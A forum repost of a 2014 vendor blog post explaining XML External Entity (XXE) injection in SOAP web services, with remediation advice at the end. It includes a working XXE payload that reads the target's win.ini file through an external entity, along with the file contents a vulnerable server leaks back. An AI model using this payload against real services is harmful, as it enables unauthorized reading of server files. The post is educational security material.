Nytro Posted August 31, 2014 Report Posted August 31, 2014 XML External Entity Injection For Fun and Maybe ProfitEd_A| August 28, 2014Ooo injection…or maybe oww injectionSource: https://flic.kr/p/5LPRs7The eXtensible markup language, or XML, is commonly used in applications. XML allows data to be represented in a structured manner and is handled by an XML parser. XML parsers open up new avenues for web attacks including XML Injection, Entity Expansion and the topic of this blog, XML External Entity Injection; but first, some background.SOAP Web ServicesThe Simple Object Access Protocol, or SOAP, is a type of web service. SOAP is standards based. The transport is XML over HTTP in both directions. A standard SOAP request looks like this one available at http://www.webservicex.net/ws/WSDetails.aspx?CATID=2&WSID=9: POST /stockquote.asmx HTTP/1.1Host: www.webservicex.netContent-Type: text/xml; charset=utf-8Content-Length: lengthSOAPAction: "http://www.webserviceX.NET/GetQuote"<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <GetQuote xmlns="http://www.webserviceX.NET/"> <symbol>string</symbol> </GetQuote></soap:Body></soap:Envelope>HTTP/1.1 200 OKContent-Type: text/xml; charset=utf-8Content-Length: length<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <GetQuoteResponse xmlns="http://www.webserviceX.NET/"> <GetQuoteResult>string</GetQuoteResult> </GetQuoteResponse></soap:Body></soap:Envelope>A SOAP envelope containing XML is sent to the server via POST, processed by an XML parser, and the server responds with a SOAP envelope containing the response.XXEXML External Entity (XXE) injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage.XXE Injection is an attack in which an attacker defines an arbitrary entity that is executed by the XML parser if the parser lacks validation checks. Entities are used as abbreviations to represent a repetitive value. External entities can reference files on the parser's filesystem; exploiting this feature may allow retrieval of arbitrary files, or denial of service by causing the server to read from a file such as /dev/random. They can also reference URLs; exploiting this feature may allow port scanning from the XML parser's host, or the retrieval of sensitive web content which is otherwise inaccessible due to network topology and defenses.An attack string would look like:<!DOCTYPE foo [<!ENTITY test SYSTEM "file:///c:/windows/win.ini"> ]>This string is referred to as a DTD or Document Type Declaration. A DTD is simply a mechanism for defining entities. The DOCTYPE declaration “foo” is not important. This can be any arbitrary value. The value “SYSTEM” indicates the file should be read from the location that follows. This string is telling the XML parser to replace references to “&test;” with the contents of C:\Windows\win.ini. This could be any file readable by the account under which the application is running.The defined entity “test” would then be inserted into the normal SOAP message in a value. The full attack payload would resemble:<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY test SYSTEM "file:///c:/windows/win.ini"> ]><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <GetQuoteResponse xmlns="http://www.webserviceX.NET/"> <GetQuoteResult>&test;</GetQuoteResult> </GetQuoteResponse></soap:Body></soap:Envelope>If the service is vulnerable, it should return: HTTP/1.1 200 OKContent-Type: text/xml; charset=utf-8Content-Length: length<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <GetQuoteResponse xmlns="http://www.webserviceX.NET/"> <GetQuoteResult>; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1[MCI Extensions.BAK]aif=MPEGVideoaifc=MPEGVideoaiff=MPEGVideoasf=MPEGVideoasx=MPEGVideoau=MPEGVideom1v=MPEGVideom3u=MPEGVideomp2=MPEGVideomp2v=MPEGVideomp3=MPEGVideompa=MPEGVideompe=MPEGVideompeg=MPEGVideompg=MPEGVideompv2=MPEGVideosnd=MPEGVideowax=MPEGVideowm=MPEGVideowma=MPEGVideowmv=MPEGVideowmx=MPEGVideowpl=MPEGVideowvx=MPEGVideo</GetQuoteResult> </GetQuoteResponse></soap:Body></soap:Envelope>This attack is beginning to appear more often despite the fact that the vulnerability has existed for years. In January, Facebook paid one of the largest bounties to date for a XXE vulnerability discovered in OpenID Facebook Pays $33,500 Bounty for Major Code Execution Flaw | Threatpost | The first stop for security news. If you read the article, you will see that XXE can be turned into remote code execution. Intriguing…FixesValidate user supplied input before passing it to the XML parser for processing. Additionally the parser may be able to disable DTD parsing and/or disable resolution of external entities via configuration options.As always, feel free to reach out to us here at FoD at with any questions via Twitter (@hpappsecurity) or via email (fodsales(at)hp.com). We'd love to hear your questions or comments about our data breaches, identity theft management, and how it affects you.Sursa: XML External Entity Injection For Fun and Maybe Pr... - HP Enterprise Business Community Quote
